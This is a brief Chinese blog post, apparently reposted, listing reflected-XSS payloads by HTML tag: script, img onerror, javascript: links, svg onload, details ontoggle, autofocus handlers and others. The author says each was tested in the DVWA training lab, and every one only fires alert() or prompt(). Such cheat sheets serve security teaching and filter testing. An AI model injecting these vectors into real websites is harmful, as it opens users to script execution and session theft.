所有標簽已經測試完并可以使用，測試環境：DVWA的反射型XSS，等級low

0x01 <script>標簽

<script>alert(2)</script> <script>alert(2)</script//

0x02 <img>標簽

<img src="x" onerror=alert(1)>; <img src="1" onerror=eval("alert('xss')")>; <img src=1 onmouseover=alert('xss')>

0x03 <a>標簽

<a href="javascript:alert('xss')">aa</a> <a href=javascript:eval(alert('xss'))>aa</a>

0x04 input標簽

<input value="" onclick=alert('xss') type="text"> <input name="name" value="" onmouseover=prompt('xss') bad="">

0x05 svg標簽

<svg onload=alert(1)>

0x06 details標簽

<details ontoggle="alert('xss');"> <details open ontoggle="alert('xss');">

0x07 select標簽

<select onfocus=alert(1)></select> <select onfocus=alert(1) autofocus>

0x08 iframe標簽

<iframe onload=alert("xss");></iframe>

0x09 video標簽

<video><source onerror="alert(1)">

0x0A audio標簽

<audio src=x onerror=alert("xss");>

0x0B body標簽

<body/onload=alert("xss");>

0x0C textarea標簽

<textarea onfocus=alert("xss"); autofocus>

-------------------------------------------------------------
目前只有這么多，以后繼續加

總結

以上是生活随笔為你收集整理的web安全---XSS漏洞之标签使用2的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。